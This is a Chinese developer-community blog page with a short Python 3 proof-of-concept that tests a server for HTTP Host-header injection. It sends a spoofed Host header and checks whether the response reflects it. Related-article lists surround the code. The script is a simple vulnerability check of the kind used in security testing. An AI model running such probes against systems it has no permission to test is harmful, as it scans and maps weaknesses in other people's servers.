AI 助理
备案控制台
开发者社区 安全 文章 正文

python3基础学习(http host头攻击漏洞POC)

2017-11-12 2386
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:

  简单版http host头攻击漏洞POC,没有对异常进行处理,没有对意外情况进行处理,所以是简单版!代码如下:

from urllib import request
import sys
import re
url=sys.argv[1]
header={'Host' : 'www.eth10.com'}

req=request.Request(url,headers=header)
u = request.urlopen(req)
resp = u.read()

if re.match('.*www.eth10.com',str(resp)):
    print('漏洞存在')
else:
    print('不存在该漏洞')

  使用语法:python3 host.py URL,URL格式为:http://xx.xx.xx


本文转自 eth10 51CTO博客,原文链接:http://blog.51cto.com/eth10/2052582


文章标签:
安全
Python
关键词:
Python学习
Python HTTP
HTTP host
学习HTTP
HTTP host攻击
科技小能手
目录
相关文章
童小纯
|
JavaScript
Node.js【GET/POST请求、http模块、路由、创建客户端、作为中间层、文件系统模块】(二)-全面详解(学习总结---从入门到深化)
Node.js【GET/POST请求、http模块、路由、创建客户端、作为中间层、文件系统模块】(二)-全面详解(学习总结---从入门到深化)
童小纯
132 0
老板这功能得加钱
|
监控 Unix 应用服务中间件
Android-音视频学习系列-(八)基于-Nginx-搭建(rtmp、http)直播服务器
Android-音视频学习系列-(八)基于-Nginx-搭建(rtmp、http)直播服务器
老板这功能得加钱
437 0
nanshaws
|
Java Maven Kotlin
vertx的学习总结7之用kotlin 与vertx搞一个简单的http
本文介绍了如何使用Kotlin和Vert.x创建一个简单的HTTP服务器,包括设置路由、处理GET和POST请求,以及如何使用HTML表单发送数据。
nanshaws
211 2
vertx的学习总结7之用kotlin 与vertx搞一个简单的http
椰椰椰耶
|
JSON 缓存 JavaScript
【HTTP】请求“报头”(Host、Content-Length/Content-Type、User-Agent(简称 UA))
【HTTP】请求“报头”(Host、Content-Length/Content-Type、User-Agent(简称 UA))
椰椰椰耶
544 2
GG2020gg
|
缓存 安全 应用服务中间件
Web安全-HTTP Host头攻击
Web安全-HTTP Host头攻击
GG2020gg
988 7
GG2020gg
|
缓存 安全 应用服务中间件
Web安全-HTTP Host头攻击
Web安全-HTTP Host头攻击
GG2020gg
1020 3
GG2020gg
HTTP慢速攻击详解
HTTP慢速攻击详解
GG2020gg
257 7
屿小夏
|
安全 Python
【Python】已完美解决:WARNING: The repository located at mirrors .aliyun.com is not a trusted or secure host
【Python】已完美解决:WARNING: The repository located at mirrors .aliyun.com is not a trusted or secure host
屿小夏
2241 1
码农阿豪
|
缓存 负载均衡 NoSQL
Redis系列学习文章分享---第十四篇(Redis多级缓存--封装Http请求+向tomcat发送http请求+根据商品id对tomcat集群负载均衡)
Redis系列学习文章分享---第十四篇(Redis多级缓存--封装Http请求+向tomcat发送http请求+根据商品id对tomcat集群负载均衡)
码农阿豪
199 1
路边两盏灯
【Azure 云服务】Azure Cloud Service 为 Web Role(IIS Host)增加自定义字段 (把HTTP Request Header中的User-Agent字段增加到IIS输出日志中)
【Azure 云服务】Azure Cloud Service 为 Web Role(IIS Host)增加自定义字段 (把HTTP Request Header中的User-Agent字段增加到IIS输出日志中)
路边两盏灯
202 0

热门文章

最新文章

  • 1
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html><head><meta http-equiv="Cont
  • 2
    The Delicate Art of Remote Checks – A Glance Into MS15-034 - See more at: http://blog.beyondtrust.co
  • 3
    HTTP状态码I
  • 4
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html><head><meta http-equiv="Cont
  • 5
    HTTP协议,Content-Type格式介绍篇
  • 6
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html><head><meta http-equiv="Cont
  • 7
    HTTP 和 TCP 协议的主要区别
  • 8
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html><head><meta http-equiv="Cont
  • 9
    AngularJS 用 $http.jsonp 跨域SyntaxError问题
  • 10
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html><head><meta http-equiv="Cont
  • 1
    基于python大数据的台风灾害分析及预测系统
    386
  • 2
    基于Python大数据的热门游戏推荐系统
    257
  • 3
    基于python大数据的青少年网络使用情况分析及预测系统
    335
  • 4
    2026版基于python大数据的电影分析可视化系统
    333
  • 5
    基于Python大数据的的电商用户行为分析系统
    382
  • 6
    基于python大数据技术的医疗数据分析与研究
    199
  • 7
    基于python大数据深度学习的酒店评论文本情感分析系统
    325
  • 8
    Python SQLAlchemy模块:从入门到实战的数据库操作指南
    403
  • 9
    基于python大数据的的海洋气象数据可视化平台
    211
  • 10
    基于Python大数据的主流汽车价格分析可视化系统
    214

    • 相关课程

    更多
  • Python Web开发基础
  • Python爬虫实战
  • Python开发基础入门
  • Python常用数据科学库
  • Python网络爬虫实战
  • 云安全基础课- HTTP协议基础

    • 相关电子书

    更多
  • From Python Scikit-Learn to Sc
  • Data Pre-Processing in Python:
  • 双剑合璧-Python和大数据计算平台的结合

    • 相关实验场景

    更多
  • 通过轻量消息队列(原MNS)主题HTTP订阅+ARMS实现自定义数据多渠道告警

    • 推荐镜像

    更多
  • python-release
    • 下一篇
    安全设备篇——WAF